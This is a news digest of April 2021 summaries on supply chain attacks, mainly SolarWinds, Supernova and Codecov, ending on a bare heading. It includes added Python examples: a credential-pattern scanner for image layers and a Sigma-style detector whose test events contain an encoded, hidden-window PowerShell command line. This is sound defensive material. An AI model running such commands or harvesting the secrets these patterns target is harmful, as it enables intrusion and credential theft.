_______________________________________________________________________________________

(April 27, 2021)


Defending against software supply chain attacks

The consequences of a software supply chain attack can be severe. First, threat actors use the compromised software vendor to gain privileged and persistent access to a victim network. By compromising a software vendor, they bypass perimeter security measures like border routers, firewalls, etc., and gain initial access. If a threat actor loses network access, they may re-enter a network using the compromised software vendor.

Ref - CISA 

_______________________________________________________________________________________

(April 27, 2021)


DFS report identifies key cybersecurity measures to reduce supply chain risk

The New York State Department of Financial Services (DFS) released a report on the Department’s investigation of New York’s financial services industry’s response to the supply chain attack on the IT company SolarWinds. During the SolarWinds attack, hackers corrupted routine software updates that were downloaded onto thousands of organizations’ information systems.


_______________________________________________________________________________________

(April 26, 2021)


SolarWinds, Microsoft hacks prompt focus on Zero-Trust security

Analysis of the breaches, which exploited vulnerabilities in software from SolarWinds Corp. and Microsoft Corp., from the CISA, the NSA, and the FBI found that the hackers were often able to gain broad systems access. In many cases, the hackers moved through networks unfettered to set up back doors and administrator accounts. To prevent such attacks, zero-trust models should be more widely adopted by the public and private sectors.


_______________________________________________________________________________________

(April 26, 2021)


CISA and NIST release new interagency resource to defend against supply chain attacks

To help software vendors and customers defend against these attacks, CISA and the NIST have released Defending Against Software Supply Chain Attacks. This new interagency resource provides an overview of software supply chain risks and recommendations. The publication also provides guidance on using NIST’s Cyber Supply Chain Risk Management (C-SCRM) framework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate risks.

Ref - CERT-CISA 

_______________________________________________________________________________________

(April 26, 2021)


Another top VPN is reportedly being used to spread SolarWinds hack

Threat actors used the Pulse Secure VPN appliance to install the Supernova webshell in a victim’s SolarWinds Orion server and collect user credentials without permission, a new warning has said. This appears to be the first observed instance of a threat actor injecting the Supernova webshell directly into a victim’s SolarWinds installation.

Ref - TechRadar 

_______________________________________________________________________________________

(April 25, 2021)


Stopping SolarWinds’ style mega hacks, but preserving democracy

The SolarWinds and Shirbit hacks announced last December, along with a variety of other major cyberattacks, have convinced the US and Israeli governments that leaps forward are needed to keep up with the new frenetic pace of digital warfare. And taking countermeasures involves several challenges. One of the challenges is that the NSA is more limited by law from counter-hacking a US computer already hacked by a foreign adversary than it is going against foreign computers.


_______________________________________________________________________________________

(April 24, 2021)


HashiCorp is the latest victim of the Codecov supply-chain attack

Open-source software tools and Vault maker HashiCorp has disclosed a security incident that occurred due to the recent Codecov attack. HashiCorp, a Codecov customer, has stated that the recent Codecov supply-chain attack aimed at collecting developer credentials led to the exposure of HashiCorp's GPG signing key.


_______________________________________________________________________________________

(April 23, 2021)


Senators introduce legislation to protect critical infrastructure against attack

Sens. Maggie Hassan (D-N.H.) and Ben Sasse (R-Neb.) on Friday introduced legislation intended to protect critical infrastructure from cyberattacks and other national security threats. The National Risk Management Act would require the CISA to conduct a five-year national risk management cycle.
 
Ref - The Hill 

_______________________________________________________________________________________

(April 23, 2021)


Passwordstate password manager hacked in a supply chain attack

Click Studios, the company behind the Passwordstate enterprise password manager, notified its customers that attackers compromised the app's update mechanism to deliver malware in a supply-chain attack after breaching its networks. Malicious upgrades leading to the supply chain compromise were potentially downloaded by customers between April 20 and April 22.


_______________________________________________________________________________________

(April 23, 2021)


Supply chain attack risk looms over three million mobile app users of CocoaPods

A remote code execution (RCE) vulnerability in the central CocoaPods server could have potentially impacted up to three million mobile apps that relied on the open-source package manager. CocoaPods maintainer Orta Therox likened the potential impact of the flaw to that caused by XcodeGhost, a counterfeit version of macOS development environment Xcode.

Ref - PortSwigger 

_______________________________________________________________________________________

(April 23, 2021)


New analysis uncovers extensive SolarWinds attack infrastructure

Cybersecurity researchers who have been tracking the infrastructure footprint of the SolarWinds threat actors claim the network of servers used in the attack is "significantly larger than previously identified". RiskIQ has identified an additional 18 command and control (C&C) servers that communicated with the malicious payloads that were dropped as part of the cyberattack.

Ref - TechRadar 

_______________________________________________________________________________________

(April 22, 2021)


SUPERNOVA redux, with a portion of masquerading

The SolarWinds attack has a few interesting traits. The first is that the adversary is using residential IP addresses based in the US to make them appear as US-based employees and then leveraging valid accounts to gain access via the VPN. From there, the adversary used a VM and obfuscated PowerShell scripts to move laterally to the SolarWinds server. At this point, the SUPERNOVA webshell is installed. 

Ref - Splunk 

_______________________________________________________________________________________

(April 22, 2021)


CISA identifies Supernova malware during incident response

CISA has revealed that the SolarWinds attackers connected to the entity’s network via a Pulse Secure virtual private network (VPN) appliance, moved laterally to its SolarWinds Orion server, installed malware referred to by security researchers as SUPERNOVA (a .NET webshell), and collected credentials. CISA has released a report providing TTPs observed during an incident response engagement.

Ref - CISA 

_______________________________________________________________________________________

(April 22, 2021)


SolarWinds hack analysis reveals 56% boost in command server footprint

The Sunburst/Solorigate backdoor was designed to identify, avoid, or disable different security products, with a particular focus on circumventing antivirus software developed by FireEye, CrowdStrike, Microsoft, ESET, and F-Secure in the first stage of infection. The second and third stages included custom droppers (Teardrop/Raindrop) and the deployment of additional malware alongside Cobalt Strike. Implants for persistence with components dubbed Goldmax/GoldFinder/Sibot, as well as Sunshuttle, have also been connected to these stages. 

Ref - ZDNet 

_______________________________________________________________________________________

(April 22, 2021)


Software supply chain may get you by exploiting third-party applications

Attacks targeting “zero-days,” or unpatched security bugs, in commonly used third-party applications are another example of the risks from the software supply chain. The recent attacks on the Microsoft Exchange Server are just the latest examples of this type of software supply chain attack. In this case, bugs in Exchange Server allowed attackers to read emails and install a web shell.


_______________________________________________________________________________________

(April 22, 2021)


Supernova threat actors masqueraded as remote workers to access breached network

Members of an APT group, masquerading as teleworking employees with legitimate credentials, accessed a U.S. organization's network and planted a backdoor called Supernova on its SolarWinds Orion server for conducting reconnaissance, domain mapping, and data theft. The attackers had access to the network for nearly one year, from March 2020 to February 2021, before they were discovered and blocked.

Ref - DarkReading 

_______________________________________________________________________________________

(April 21, 2021)


White House shares learnings from the SolarWinds and Microsoft Exchange server cyber incidents

Lessons learned from the recent attacks include 'integrating private sector partners at the executive and tactical levels'. It also includes involving private sector organizations in the response in order to help deliver fixes smoothly, like Microsoft's one-click tool to simplify and accelerate victims' patching and clean-up efforts, as well as sharing relevant information between firms.

Ref - ZDNet 

_______________________________________________________________________________________

(April 20, 2021)


A software supply chain may take you down via vendor compromise

Arguably the most sophisticated of the supply chain attack methods, a Vendor Compromise typically starts with a reconnaissance phase to understand which organizations use the vendor’s software, and other relevant details. Next, the bad actor attempts to gain valid vendor employee credentials via social engineering, phishing, or other more technical means. The malicious operator then attempts to laterally move to the software build environment in order to modify the source code of the application that the vendor provides to its users.


_______________________________________________________________________________________

(April 20, 2021)


The wide web of nation-state hackers attacking the US

As both the SolarWinds supply chain and Microsoft Exchange Server attacks have shown, the targets are no longer limited to federal agencies and the largest companies. Enterprises of all sizes are now at risk, whether it's ransomware or a data breach. In terms of attacks on the U.S., nation-state threat actors typically (but not always) come from the "big four": China, Russia, North Korea, and Iran.

Ref - TechTarget 

_______________________________________________________________________________________

(April 20, 2021)


Codecov supply chain attack has echoes of SolarWinds

To date, Codecov says that it has detected periodic alterations of the Bash uploader script going back as far as 31 January, which ultimately could have allowed whoever was behind the attack to export information stored in its users’ continuous integration (CI) environments. Among Codecov’s larger customers, both HPE and IBM confirmed to Reuters that they were now probing their own systems for signs of intrusion.


_______________________________________________________________________________________

(April 20, 2021)


Hundreds of networks reportedly hacked in Codecov supply-chain attack

In new reporting by Reuters, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this breach beyond Codecov's own systems. Codecov had suffered a supply-chain attack that went undetected for over two months.


_______________________________________________________________________________________

(April 19, 2021)


White House stands down SolarWinds, Microsoft Exchange cyber response groups

Stepped up patching for the SolarWinds and Microsoft Exchange vulnerabilities has allowed the White House to stand down the two Unified Coordination Groups (UCGs) tasked with tackling the government's response to the cybersecurity threats. They were activated shortly after each incident was discovered.

Ref - GCN 

_______________________________________________________________________________________

(April 19, 2021)


SolarWinds backdoor was downloaded by 1/4th of Electric Utilities - US Utility Regulator

North American Electric Reliability Corp. (NERC), a non-profit regulatory authority that oversees utilities in the United States and Canada, revealed this week that about 25% of the electric utilities on the North American power grid downloaded the SolarWinds backdoor.

Ref - CPO Magazine 

_______________________________________________________________________________________

(April 19, 2021)


Positive Technologies denies involvement in SolarWinds attack

Responding to sanctions imposed by the US government, Russia-headquartered cybersecurity company Positive Technologies (PT) has denied any wrongdoing, and dismissed the claims as “groundless accusation”. Last week, the US Department of the Treasury imposed sanctions on several Russian technology firms, including PT, accusing them of helping Russian state actors to conduct cyberattacks against the West.

Ref - TechRadar 

_______________________________________________________________________________________

(April 19, 2021)


XCSSET malware now targeting Apple's M1-based Macs

A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps. XCSSET continues to abuse the development version of the Safari browser to plant JavaScript backdoors to websites via Universal Cross-site Scripting (UXSS) attacks.


_______________________________________________________________________________________

(April 19, 2021)


Codecov hack could be another SolarWinds-type attack

US federal authorities are investigating a security breach suffered by software auditing company Codecov. According to a statement put out by the San Francisco-based firm, an unscrupulous user broke through its digital defenses and modified its Bash Uploader script. While Codecov has emailed all affected users, the nature of the changes to the script potentially puts thousands of customers at risk.

Ref - TechRadar

_______________________________________________________________________________________

(April 19, 2021)


Zero-trust is the best defense against third-party attacks

Adopting a zero-trust security strategy can better safeguard organizations against third-party attacks, where suppliers should not simply be entrusted to do the right thing. The Acronis CEO believed third-party attacks such as those involving Accellion and Singapore Airlines (SIA) could have been prevented with a zero-trust architecture. Zero trust isn't just about not trusting anyone, it's about personal cyber hygiene.

Ref - ZDNet

_______________________________________________________________________________________

(April 19, 2021)


Next SolarWinds crisis could happen very soon

The SolarWinds cyber attack, which saw around 100 companies and 9 US federal agencies compromised, isn’t one to be treated as an isolated incident. It is rather a stark warning of what is about to come if decisive action isn’t taken. The vice-president and chief information security officer at Hitachi Vantara discusses how companies can avoid a similar supply-chain crisis.


_______________________________________________________________________________________

(April 17, 2021)


SolarWinds hacking campaign puts Microsoft in the hot seat

Microsoft has offered all federal agencies a year of “advanced” security features at no extra charge. Microsoft also removed names of several Russian IT companies, including Positive Technologies, from a list to whom Microsoft supplied the early access to data on vulnerabilities detected in its products.

Ref - Yahoo 

_______________________________________________________________________________________

(April 17, 2021)


Six out of 11 EU agencies running SolarWinds Orion software were hacked

CERT-EU confirmed that 14 EU agencies were running the SolarWinds Orion monitoring software, and six of them were breached. However, CERT-EU did not reveal the names of the EU agencies that installed the tainted Orion updates. CERT-EU said that some agencies sent only limited details on the attacks, while in other cases the network logs needed to hunt for clues about the hackers’ actions were often not available.


_______________________________________________________________________________________

(April 17, 2021)


Biden upends U.S. convention on cyber espionage

President Biden’s decision to punish Russia for the SolarWinds hack broke with years of U.S. foreign policy that has tolerated cyber espionage as an acceptable form of 21st-century spycraft. The administration also said U.S. intelligence had “high confidence” that Russia’s foreign intelligence service, the SVR, was behind last year’s SolarWinds hack, which compromised at least nine federal agencies and about 100 private-sector organizations.


_______________________________________________________________________________________

(April 16, 2021)


Commerce Dept. may have found SolarWinds backdoor in Aug. 2020

Last month, Microsoft and FireEye identified that file as a newly-discovered fourth malware backdoor used in the sprawling SolarWinds supply chain hack. FireEye refers to the backdoor as “Sunshuttle,” whereas Microsoft calls it “GoldMax.” A search in VirusTotal’s malware repository shows that on Aug. 13, 2020, someone from the National Telecommunications and Information Administration (NTIA), a division of the U.S. Commerce Department, had uploaded a file with that same name and file hashes.


_______________________________________________________________________________________

(April 16, 2021)


More countries officially blame Russia for SolarWinds attack

The United Kingdom, Canada, the European Union, and NATO have expressed support for the United States in blaming Russia for the cyberattack on IT management company SolarWinds, which impacted organizations worldwide. The announcements were made the same day that the United States expelled 10 Russian diplomats and sanctioned dozens of companies and people.


_______________________________________________________________________________________

(April 16, 2021)


The untold story of the SolarWinds hack

Hackers believed to be directed by the Russian intelligence service, the SVR, used the routine software update to slip malicious code into Orion's software and then used it as a vehicle for a massive cyberattack against America. The concern is that the same access that gives the Russians the ability to steal data could also allow them to alter or destroy it.

Ref - NPR 

_______________________________________________________________________________________

(April 15, 2021)


The U.S. imposes sanctions on Russia over cyber-attacks

The US has announced sanctions against Russia in response to what it says are cyber-attacks and other hostile acts. The measures, which target dozens of Russian entities and officials, aim to deter Russia's harmful foreign activities. The statement says Russian intelligence was behind last year's massive SolarWinds hack and accuses Moscow of interference in the 2020 election.
 
Ref - BBC

_______________________________________________________________________________________

(April 15, 2021)


Codecov Bash Uploader tool compromised in supply chain hack

At the beginning of April, security professionals at Codecov learned that someone had gained unauthorized access to their Bash Uploader script and modified it without permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify the Bash Uploader script.
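The credential leak described above is the kind of defect an automated check on the image build can catch before anything is published. As an added example (not code from Codecov or from the article), the block below packs a constructed image layer as a tar archive and scans every file in it for credential-shaped content, the way a pre-push gate would. The file paths, the token value and the `UPLOAD_SIGNING_TOKEN` name are made up for this example, and `AKIAIOSFODNN7EXAMPLE` is the placeholder access key ID from AWS's own documentation.

```python
"""Scan an exported container image layer for credentials baked into files.

Constructed example: the "layer" is a tar archive built in memory, which is
the on-disk shape of one layer in an exported image, so the check runs
offline. Patterns are illustrative, not an exhaustive secret-detection set.
"""
import io
import re
import tarfile

SECRET_PATTERNS = {
    # NAME=value where NAME looks like a credential and the value is non-trivial
    "assignment": re.compile(
        r"^\s*(?:export\s+)?([A-Z0-9_]*(?:KEY|TOKEN|SECRET|PASSWORD)[A-Z0-9_]*)"
        r"\s*=\s*(\S{12,})", re.M),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}
SKIP_SUFFIXES = (".png", ".jpg", ".gz", ".so", ".pyc")  # binary blobs: skip, not text
MAX_BYTES = 2_000_000


def build_layer(files):
    """Pack {path: text} into an uncompressed tar archive (one image layer)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name=path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed layer: an application image that accidentally copied its .env
# file and a credentials file into the build context.
SAMPLE_LAYER = build_layer({
    "app/main.py": "print('hello')\n",
    "app/.env": "DEBUG=1\nUPLOAD_SIGNING_TOKEN=4f9a2b8c7d1e0f3a5b6c7d8e9f0a1b2c\n",
    "root/.aws/credentials": "[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n",
    "app/README.md": "Set TOKEN=<your token> before running.\n",  # placeholder, no hit
})


def _redact(text):
    """Keep enough to locate the hit without copying the secret into a report."""
    first = text.splitlines()[0]
    return first[:12] + "..." if len(first) > 12 else first


def scan_layer(layer_bytes):
    """Return (path, pattern_name, redacted_preview) for every hit in one layer."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:*") as tar:
        for member in tar:
            if (not member.isfile() or member.name.endswith(SKIP_SUFFIXES)
                    or member.size > MAX_BYTES):
                continue
            text = tar.extractfile(member).read().decode("utf-8", errors="replace")
            for name, pattern in SECRET_PATTERNS.items():
                for hit in pattern.finditer(text):
                    findings.append((member.name, name, _redact(hit.group(0))))
    return findings


def is_clean(layer_bytes):
    """Gate decision: True only when no pattern fired in the layer."""
    return not scan_layer(layer_bytes)


if __name__ == "__main__":
    import sys
    for path, kind, preview in scan_layer(SAMPLE_LAYER):
        print(f"{kind:18} {path}: {preview}")
    sys.exit(0 if is_clean(SAMPLE_LAYER) else 1)  # fail the build on any hit
```

Run stand-alone it prints the two findings and exits non-zero, which is the behaviour a CI job wants from a gate. The scan reports a redacted preview rather than the matched value, so the build log itself does not become a second place the secret leaks. A `.dockerignore` that excludes `.env` and credential directories prevents the copy in the first place; the scan is the check that the exclusion actually worked.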


_______________________________________________________________________________________

(April 15, 2021)


Biden unveiled Russia sanctions over SolarWinds hack 

Ten Russian diplomatic officials are to be expelled from the US and up to 30 entities will be blacklisted in the largest round of sanctions action against Russia of Joe Biden’s presidency. The US is set to announce new sanctions against Russia as soon as Thursday in retaliation for Moscow’s interference in elections, alleged bounties on US soldiers in Afghanistan, and cyber-espionage campaigns such as the SolarWinds hack, according to reports in US and international media.


_______________________________________________________________________________________

(April 14, 2021)


The misuse of X.509 certificates & keys in SolarWinds hack

A report described the misuse of X.509 certificates and keys in the SolarWinds attack and how Cryptomathic CKMS and CSG could help protect against such attacks. While multiple failures led to the attack, one of the most glaring failures was that the attackers could misuse X.509 certificates and keys to forge and undermine trust. 


_______________________________________________________________________________________

(April 14, 2021)


Advanced supply chain attacks need a strategic counter-defense policy

Enterprise CIOs and CISOs in government and the private sector are still assessing the full impact of the advanced supply chain attacks uncovered in recent months. The fact of the matter here is that cyber is where the new wars are being fought and supply chain attacks are a winning playbook for the state-sponsored attackers.


_______________________________________________________________________________________

(April 14, 2021) 


Sunburst hack costs SolarWinds at least $18M

SolarWinds disclosed that it took a hit of at least $18 million from the massive Russian malware attack that compromised its flagship Orion technology management software. In releasing preliminary first-quarter results, SolarWinds said it spent $18 million to $19 million to investigate and remediate the cyber incident, related legal and other professional services, and consulting services provided to customers at no charge.

Ref - CFO

_______________________________________________________________________________________

(April 13, 2021)


macOS malware hidden in the npm package supply chain

A new malicious package has been spotted on the npm registry, which targets NodeJS developers using Linux and Apple macOS operating systems. The malicious package is called "web-browserify," and imitates the popular Browserify npm component downloaded over 160 million times over its lifetime.


_______________________________________________________________________________________
 
(April 13, 2021) 


U.S. intelligence community details growing influence threats in wake of SolarWinds attacks

The intelligence community made its most direct public attribution yet that Russia was behind weaving malicious code into a SolarWinds software update to facilitate a sweeping espionage operation, impacting hundreds of companies and U.S. federal agencies. The readout does not specify whether Biden specifically discussed SolarWinds with his Russian counterpart.

Ref - CyberScoop 

_______________________________________________________________________________________

(April 13, 2021) 


Spy Chiefs to warn of threats from SolarWinds to North Korea

Biden’s intelligence team -- including Director of National Intelligence Avril Haines and CIA Director William Burns -- is under increasing pressure to respond to a widening series of national security threats while defending the administration’s continuing reviews and policy approaches even as it nears the 100-day mark in office.

Ref - Bloomberg

_______________________________________________________________________________________

(April 13, 2021) 


Detecting the next SolarWinds-Style cyberattack

Developing SIEM rules, using the SolarWinds attack as an example, can help in the detection of the next SolarWinds-like attack. Sigma rules can be used as a sort of common language to create and share quality queries regardless of the SIEM an organization uses. This will enable Security Operations teams to build out the elements needed to detect future attacks. The same Sigma rule can be used across multiple SIEMs, including Splunk, QRadar, and Azure Sentinel.
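As an added illustration of that point (example code written for this page, not from the article or from the Sigma project), the block below holds one Sigma-style rule as a Python dictionary, evaluates it directly over a few constructed process-creation events, and renders the same detection as a Splunk-style search string. The rule, the events, and the exempted service account `CORP\svc-deploy` are all constructed; real rules are written in Sigma's YAML and converted with the project's own tooling, which this toy evaluator only mimics.

```python
"""Toy evaluator and renderer for a Sigma-style detection rule (constructed example).
A Sigma rule names selections of field/value pairs and a condition that combines
them; one rule can then be rendered for any SIEM or, as here, run over raw events."""

# Constructed rule (not from the page or the public Sigma repository): an encoded
# PowerShell command launched by the IIS worker process, the kind of child process
# a webshell on a web server produces. The filter exempts a fictional service account.
RULE = {
    "title": "Encoded PowerShell spawned by IIS worker process",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "ParentImage|endswith": "\\w3wp.exe",
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["-enc", "-EncodedCommand"],
        },
        "filter": {"User": "CORP\\svc-deploy"},
        "condition": "selection and not filter",
    },
}

# Constructed process-creation events using the field names Sigma expects.
EVENTS = [
    {"id": "evt-1",  # webshell-shaped: IIS worker spawning encoded PowerShell
     "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QQBCAEMA",
     "User": "IIS APPPOOL\\DefaultAppPool"},
    {"id": "evt-2",  # same command line, but launched from an interactive parent
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -enc QQBCAEMA",
     "User": "CORP\\alice"},
    {"id": "evt-3",  # matches the selection but runs as the exempted account
     "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh.exe -EncodedCommand QQBCAEMA",
     "User": "CORP\\svc-deploy"},
]


def _match_value(actual, modifier, expected):
    """Apply one Sigma value modifier; Sigma string matching is case-insensitive."""
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    return a == e


def _selection_matches(selection, event):
    """Every field in a selection must match (AND); a list of values is OR."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        candidates = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(event[field], modifier, v) for v in candidates):
            return False
    return True


def evaluate(rule, event):
    """Evaluate conditions like 'a', 'a and b', 'a or b', 'a and not b', left to right."""
    detection = rule["detection"]
    result, op, negate = None, None, False
    for token in detection["condition"].split():
        if token in ("and", "or"):
            op = token
        elif token == "not":
            negate = True
        else:
            value = _selection_matches(detection[token], event) != negate
            negate = False
            if result is None:
                result = value
            else:
                result = (result and value) if op == "and" else (result or value)
    return bool(result)


def matches(rule, events):
    """Return the ids of the events the rule fires on."""
    return [e["id"] for e in events if evaluate(rule, e)]


def render_splunk(rule):
    """Render the detection as a Splunk-style search; other backends differ only in syntax."""
    wildcard = {"contains": "*{}*", "startswith": "{}*", "endswith": "*{}", "": "{}"}
    query = rule["detection"]["condition"]
    for name, selection in rule["detection"].items():
        if name == "condition":
            continue
        clauses = []
        for key, expected in selection.items():
            field, _, modifier = key.partition("|")
            candidates = expected if isinstance(expected, list) else [expected]
            alternatives = [f'{field}="{wildcard[modifier].format(v)}"' for v in candidates]
            clauses.append("(" + " OR ".join(alternatives) + ")")
        query = query.replace(name, "(" + " ".join(clauses) + ")")  # adjacent terms are ANDed
    return query.replace(" and not ", " NOT ").replace(" and ", " ").replace(" or ", " OR ")
```

`matches(RULE, EVENTS)` returns `['evt-1']`: the explorer-launched command is ignored because the parent does not match, and the deployment account is dropped by the filter, which is exactly the logic a second analyst should be able to read off the rule without knowing which SIEM it will land in. `render_splunk(RULE)` shows the same rule as one backend's search; swapping the backend changes the rendering function, not the rule.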

_______________________________________________________________________________________

(April 12, 2021)


SolarWinds hack underscores the need for moving to the cloud

According to Microsoft CEO Satya Nadella, the SolarWinds attack underscores the importance of implementing zero trust architecture and migrating to the cloud. Nadella sees the SolarWinds hack as a wake-up call for all companies to take security as a first-class priority.

Ref - CRN

_______________________________________________________________________________________

(April 12, 2021)


Biden names former top NSA officials to two key cyber roles

President Biden has appointed former National Security Agency (NSA) deputy director Chris Inglis and former deputy for counterterrorism at the NSA Jen Easterly to two top cyber roles in the administration. The appointments come as the White House is still dealing with the fallout over the SolarWinds cyber attack, which infiltrated multiple federal agencies.

Ref - Axios
 
_______________________________________________________________________________________

(April 10, 2021)


APKPure users targeted via a supply chain attack

APKPure, one of the largest alternative app stores, was the victim of a supply chain attack in which threat actors compromised client version 3.17.18 to deliver malware. The app store is available only on devices that use Google Mobile Services (GMS) and are firmly tied to Google’s infrastructure. The tainted client downloads and installs various apps, including other malicious payloads.


_______________________________________________________________________________________

(April 9, 2021)


Stopping or preventing the next SolarWinds breach 

Mitigating the next SolarWinds breach will require more cyber-savvy people to assess and recognize those threats, explain their potential impact and advocate for enterprise-wide investment in the appropriate levels of protection. Additionally, it will require more boots on the ground in a field that has evolved to encompass a growing array of sub-areas and rapidly changing technologies.


_______________________________________________________________________________________

(April 9, 2021)


Gigaset devices laced with malware in the latest supply chain attack

Cybercriminals managed to sneak several malicious apps onto Gigaset Android devices by compromising a server belonging to an external update service provider. The models affected, according to Malwarebytes, include the Gigaset GS270 and GS160, Siemens GS270 and GS160, all running Android 8, as well as the Alps P40pro, running Android 9, and S20 pro+, running Android 10.

Ref - IT Pro

_______________________________________________________________________________________

(April 9, 2021)


Supply chain disruptions lead to the loss of trillions of dollars

Supply chain disruptions in 2020 had a real impact on the bottom line, as companies lost trillions of dollars in revenue, according to the report, with 64% of respondents reporting revenue losses between 6% and 20%. The recent survey indicated that the disruptions caused a big hit in brand reputation, with 38% of respondents reporting that their brands had been impacted. Many respondents said that their struggles to maintain supplies of goods and services left customers frustrated.


_______________________________________________________________________________________

(April 9, 2021)


What the Titans of Industry Reveal about SolarWinds Attack

During the testimony, it was outlined how the SolarWinds software was hijacked and used to break into a host of other organizations, and that the hackers had been able to read Microsoft’s source code for user authentication. Unfortunately for Microsoft, and as strongly pointed out by CrowdStrike, the hackers took advantage of well-known vulnerabilities in its Windows authentication and Active Directory Federation Services.


_______________________________________________________________________________________

(April 9, 2021)


How to protect against software supply-chain attacks

Organizations can protect themselves against supply-chain attacks with some simple tips. They should avoid the use of third-party modules, watch for threats when using modules by unknown authors, and perform automated scans of code submitted in repositories. They can also have a plan for external services and develop an on-premises and cloud strategy.

Ref - SCMagazine 

_______________________________________________________________________________________

(April 8, 2021)


CISA releases tool to review Microsoft 365 post-compromise activity

CISA has released a new tool, dubbed Aviary, that can help security teams visualize and analyze data outputs generated using Sparrow, an open-source PowerShell-based tool for detecting potentially compromised applications and accounts in Azure and Microsoft 365. Sparrow was created to help defenders hunt down threat activity after the SolarWinds supply-chain attack.


_______________________________________________________________________________________

(April 8, 2021)


How to minimize cyberattacks on supply and value chains

Organizations can mitigate access-related third-party risk in several ways. This includes providing an identity to anything connecting to the enterprise, including people, systems, and things. Another way is taking advantage of identity broker technology to verify credentials and enrich authentication requirements. Access governance for third-party identities and central management of all third-party access can also help minimize the risks.


_______________________________________________________________________________________

(April 8, 2021)


Biden administration sets the stage for retaliation against Russia over SolarWinds attack

The Biden administration completed an intelligence review of alleged Russian meddling in the SolarWinds cybersecurity attack and interference in US elections. The review could set the stage for possible retaliatory actions like enacting sanctions or expulsion of Russian intel officers in the US.

Ref - Yahoo 

_______________________________________________________________________________________

(April 7, 2021)


In another supply chain incident, Gigaset injects malware into victims' phones

Android smartphones from Gigaset have been infected by malware directly from the manufacturer in what appears to be a supply-chain attack. The Trojan, once downloaded and installed on a victim's device via a poisoned software update from the vendor, is capable of opening browser windows, fetching more malicious apps, and sending people text messages to further spread the malware.

Ref - The Register 

_______________________________________________________________________________________

(April 7, 2021)


Supply-chain attacks - When trust goes wrong

Minimizing the risk of a supply-chain attack involves a never-ending loop of risk and compliance management. In the SolarWinds hack, the post-attack in-depth inspection of the third-party vendor’s product identified the exploit buried deep in the code. As a preventive measure, organizations need to have visibility into all of their suppliers and the components they deliver, which includes the policies and procedures that the company has in place.


_______________________________________________________________________________________

(April 6, 2021)


Senators press for more on SolarWinds hack after AP report

Key lawmakers said they're concerned they've been kept in the dark about what suspected Russian hackers stole from the federal government and they pressed Biden administration officials for more details about the scope of what's known as the SolarWinds hack.


_______________________________________________________________________________________

(April 6, 2021)


RSA Conference 2021 will have a keynote from SolarWinds’s president

RSA Conference announced that Sudhakar Ramakrishna, President of SolarWinds, has joined the keynote line-up for RSA Conference 2021. He will be joined by Laura Koetzle to explore the technical elements of the breach and will provide a deep understanding of the sophistication of the overall operation of the nation-state attack.


_______________________________________________________________________________________

(April 5, 2021)


SolarWinds type attacks need a serious approach toward cybersecurity 

The federal government has to take cybersecurity more seriously, both from a funding and a legislation standpoint after the SolarWinds breach. There is some hope that this will happen with the new administration, but it remains to be seen if talk will turn into action and real change. Only with a concerted effort across all levels of government, big to small, national/state to local, will we be able to overcome this cyber assault and keep our citizens safe and secure.

Ref - GovTech

_______________________________________________________________________________________

(April 5, 2021)


The cybersecurity warning system in the U.S.

Many vulnerabilities and threats aren’t discovered by the government but are regularly uncovered by hackers who find bugs, notify companies, and often work with them to develop fixes. In turn, CISA can immediately issue directives, as it did during SolarWinds and the Microsoft Exchange compromise, that mandate action for federal agencies and sound the clarion call for others to heed.


_______________________________________________________________________________________

(April 2, 2021)


The importance of supply chain risk management

With cloud and digital technology allowing companies to flourish and succeed globally, the world has never been more interconnected. However, this comes with elevated risk. Partners, vendors, and third parties can expose companies and malicious hackers are known to target organizations through their supply chain. As a result, supply chain risk management has become a critical component of any company’s risk management and cybersecurity strategy.

Ref - Varonis

_______________________________________________________________________________________

(April 2, 2021)


The positive outcome from the SolarWinds breach

The SolarWinds compromise may have some positive outcomes by shining an even harsher light on the complacency that still exists when it comes to security. That matters especially for the different security standards applied to development and supplier systems compared with in-house production systems. Securing the supply chain has now become a hot topic, and organizations can do better at protecting their infrastructure.

Ref - BMC

_______________________________________________________________________________________

(April 2, 2021)


How Russian hackers targeted US cyber first responders in SolarWinds breach

After infiltrating US government computer networks early last year as part of the SolarWinds data breach, Russian hackers then turned their attention to the very people whose job was to track them down. The hackers identified a handful of key cybersecurity officials and analysts who would be among the first to respond once the hack was detected, so-called 'threat hunters,' and attempted to access their email accounts.

Ref - CNN 

_______________________________________________________________________________________

(April 1, 2021)


After the hack, officials draw attention to supply chain threats

The National Counterintelligence and Security Center warned that foreign hackers are increasingly targeting vendors and suppliers that work with the government to compromise their products in an effort to steal intellectual property and carry out espionage. The NCSC said it is working with other agencies, including CISA, to raise awareness of the supply chain issue.

Ref - AP News 

_______________________________________________________________________________________

(April 1, 2021)


Learnings from the SolarWinds supply chain attack

